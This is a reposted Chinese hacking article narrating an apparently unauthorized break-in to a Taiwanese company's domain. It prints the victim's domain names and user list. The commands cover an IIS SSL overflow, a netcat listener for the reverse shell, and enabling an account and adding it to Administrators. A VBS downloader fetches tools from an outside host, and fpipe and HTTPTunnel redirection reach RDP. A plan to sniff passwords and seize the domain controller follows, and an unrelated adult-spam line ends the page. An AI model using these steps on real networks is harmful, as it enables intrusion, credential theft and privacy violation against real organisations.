頻道欄目
首頁 > 資訊 > 網絡安全 > 正文

對內網有端口轉發的域的滲透

12-03-06        來源:[db:作者]  
收藏   我要投稿
現在管理員的安全意識越來越高,值得慶祝,可惜大多是國外和TW的,國內倒沒見幾個管理員能配置出很BT的服務器,本文就是針對的一系列服務器配置情況(按我自己的理解),配置算比較BT的,一起來看看我們如何入侵它吧!
預想配置:
A. 配置防火墻。
B. 做Port過濾。
C. 禁止非過濾端口訪問網絡。
D. 遠程管理限定IP。
E. 等等等等,暫時沒有想到的適應此方法的配置,歡迎大家看完本文后補充。
本文作為例子的這臺服務器的配置可能有些特殊,上面的配置是我自己根據進入的機器,查看其環境來說的,不對之處請大家指出,下面正式開始艱難地Attack之路。
先用NMAP看看服務器情況:
C:\>nmap -sS -P0 xxx.xxx.xxx.xxx
 
Starting nmap 3.50 ( http://www.insecure.org/nmap ) at 2004-05-31 19:41 中國標準時間
Interesting ports on xx-xx-xx-xx.HINET-IP.hinet.net (xxx.xxx.xxx.xxx):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
110/tcp open pop3
443/tcp open https
3389/tcp open ms-term-serv
 
Nmap run completed -- 1 IP address (1 host up) scanned in 83.560 seconds
掃描出xxx.xxx.xxx.xxx此服務器有IIS SSL遠程溢出漏洞,利用SSL EXP遠程溢出成功后得到里邊的網絡環境,通過“ipconfig /all”可以發現Host Name是“lsiiwww”,具體情況請看下表(經過刪減):
C:\WINNT\system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : lsiiwww
Primary DNS Suffix . . . . . . . : lucybelle
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : lucybelle.
com
Ethernet adapter 跋辦硈絬 2:
Physical Address. . . . . . . . . : 00-E0-7D-F8-23-0F
IP Address. . . . . . . . . . . . : 192.168.1.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Ethernet adapter 跋辦硈絬:
Physical Address. . . . . . . . . : 00-01-29-60-21-EC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
DNS Servers . . . . . . . . . . . : 192.168.0.80
然后看看網絡情況“Tracert www.hinet.net”:
C:\WINNT\system32>tracert www.hinet.net
tracert www.hinet.net
Tracing route to www.kaosanakqu.com [61.219.38.89]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms 192.168.0.1
2 <10 ms <10 ms <10 ms 61.219.91.177
3 47 ms 47 ms 47 ms 10.219.9.254
4 47 ms 47 ms 47 ms ty-fo-c6r1.router.hinet.net [168.95.94.194]
5 47 ms 47 ms 47 ms ty-fo-c12r2.router.hinet.net [211.22.39.130]
6 47 ms 47 ms 47 ms tp-s2-c12r2.router.hinet.net [210.65.200.234]
7 47 ms 47 ms 46 ms tp-s2-c6r9.router.hinet.net [211.22.35.129]
8 47 ms 47 ms 47 ms 61-219-38-89.hinet-ip.hinet.net [61.219.38.89]
Trace complete.
可以看出是通過網關出去的,但也可能本機有公網IP?幢緳C服務開了3389,本來以為此次滲透就結束了,因為有了Termianl服務可以利用遠程終端連接過去就可以得到GUI界面剩下的事情就簡單了,但接著我用終端連接上去,居然出現的是 XP的登陸界面,如圖1所示。
 
圖1
IP地址輸入錯誤?不對,查看SSL反向連接過來的IP地址:
C:\>nc -vv -l -p 80
listening on [any] 80 ...
connect to [192.168.4.100] from xxx.xxx.xxx.xxx.hinet.net [xxx.xxx.xxx.xxx] 6
1041
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
IP沒錯!仔細想想原因……
根據XP登陸界面可以初步判斷此服務器位于一個域內,這就好辦了,我先在進入的那臺服務器上激活一個帳戶,然后利用這個帳戶登陸這臺XP的機器,因為是域所以有了一臺機器的一個域用戶的密碼,即可以用這個域用戶登陸這臺機器所在的域所有的機器!試下去!
激活TsInsternetUser帳戶,然后添加它到Administrators組,試著用TsInternetUser 用戶登陸XP結果失敗,被進入的機器不是域控制器。用“net user /domain”命令看這臺機器的用戶,就大致確定這臺機器不是一個域控制器了。
C:\WINNT\system32>net user /domain
net user /domain
硂兜璶―穦?呼辦 lucybelle.com.tw ??呼辦北??矪瞶?
\\lsiiweb.lucybelle.com.tw ?ㄏノ?眀め
--------------------------------------------------------------------
Administrator amanda ann
cctim coral gigi
Guest IUSR_LSIIWEB IWAM_LSIIWEBjan kaka katy
krbtgt long macy
mine peggy roger
stella tiffany tseng
TsInternetUser tsuenyu vivianhsieh
wu wukl yunyun
??磅︽Ч撥??祇ネ?┪??巋粇?
既然無法登陸,那就先看看本地機器有沒有管理員登陸,如果有人登陸,利用幾個小工具把他的密碼Dump出來就可以登陸XP的機器了。于是在目標機器上寫入一個Down.vbs,Down.vbs的使用方法是“c:>cscript down.vbs http://www.hacker.com.cn/hacker.exe hacker.exe”,意思就是主動去下載www.hacker.com.cn上的Hacker.exe文件,然后放到本地,名字依然是Hacker.exe,這個方法防火墻很少擋連,因為出去的是80端口。利用這個VBS下載Findpass和Pulist工具,以后的下載也是利用此VBS。執行Pulist結果居然發現沒有用戶登陸,看來這條路走不通了。
終端連接xxx.xxx.xxx.xxx機器,結果卻是XP的終端,但是我進入的卻是Windows 2000[192.168.1.81]的機器,在Windows 2000機器上查找主頁文件,其WEB目錄在D:\web 下,證明了我心中的猜想:可能是做了端口映射,XP機器的80和443端口直接映射到 Windows2000機器的80和443端口。我的訪問就是這樣的過程了:
Me ? xxx.xxx.xxx.xxx [xp os] -> XP port map -> windows 2000 80 port
根據NMAP掃描端口的結果,此服務器還開了21,25,110,3389等端口,但是在Windows2000機器上沒有開放25,110端口,所以我猜測是XP機器自己就開了Mail服務或者映射到別的內網機器上去了!
現在我給他來招毒的:利用Fpipe重定向端口,在Windows2000機器上執行如下命令:
fpipe -l 80 -s 53 -r 3389 192.168.1.81
意思是將發到本機80端口的連接通過53端口連接到192.168.1.81的3389端口,如果成功我可以連接這個IP的80端口,然后Fpipe把連接轉向到本地端口3389!想法不錯,可是執行Fpipe的結果直接導致了IIS掛掉,利用SSL EXP獲得的Shell也掛掉了,再次溢出的時候提示無法連接到443端口,仰天大哭!后來在實踐中發現可以利用Fpipe來端口重定向,但必須要先停止那個80端口,吃一虧長一智了。
第二天管理員重新啟動了機器,我才有機會重新利用EXP進去,幻想管理員登陸在上邊,我好直接Dump其密碼,結果是白日做夢,管理員根本不在。難道沒有別的方法來進入這臺機器么?在我第一天把機器的IIS搞當后,整整一夜我都在想該如何才可以完全控制這臺機器,后來還真被我想到了一點:用Httptunnel!
 
TIPS:什么是HTTPTunnel?
通常HTTPTunnel被稱之為HTTP暗道,它的原理就是將數據偽裝成HTTP的數據形式來穿過防火墻,實際上是在HTTP請求中創建了一個雙向的虛擬數據連接來穿透防火墻,HTTPTunnel的優點就在于即使他的機器以前80端口開著,現在這么用也不會出現什么問題,正常的WEB訪問仍然走老路子,重定向的隧道服務也暢通無阻。
 
利用Httptunnel把本地9898端口定向到遠程主機80端口:
htc -F 9898 xxx.xxx.xxx.xxx:80
把目標機器的80端口定向到本地主機的3389端口:
hts -F localhost:3389 80
再用3389終端連接目標機器,理論上是這樣的傳輸流程:
Local 3389 mstsc->localhost 9898(Httptunnel)map->server xxx.xxx.xxx.xxx 80 map->windows 2000 80(Httptunnel)map->windows 2000 3389
事實證明,利用Httptunnel是成功的:在本地執行Httptunnel客戶端:
C:\>htc -F 9898 xxx.xxx.xxx.xxx:80
目標機器執行Httptunnel服務端:
C:\WINNT\system32>hts -F localhost:3389 80
hts -F localhost:3389 80
本地利用終端程序連接本地IP:9898,如圖2所示。
 
圖2
連接上去了,2000機器終端應該是這樣的嘛。走到這一步,此次滲透就結束了,因為得到了一臺機器的GUI權限,以后的操作相對簡單:
A. 利用這臺機器作為據點,掃描其內網其他機器,找出其域控制器。
B. 在此臺機器安裝Sniffer監聽。
C. 獲取其某個域用戶帳戶密碼。
D. 攻破域控制器。
E. 所有的機器被告被控制,此次滲透結束。
大體上來講,這次入侵是比較曲折的,雖然很簡單就溢出了,但是控制整個內網卻是比較麻煩的事,特別是幾次端口轉發更是弄得湖里糊涂,很容易把思路混淆,所以這里給廣大喜歡安全的朋友們講一聲:“在入侵前請先問自己:我的目標是什么?我要怎么拿到?!”確定了目標,一切龐雜的東西都將不再成為我們的阻礙,一切都簡單了。
相關TAG標簽
上一篇:臺積電:絕大多數7nm客戶都會轉向6nm_IT新聞_博客園
下一篇:最后一頁
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片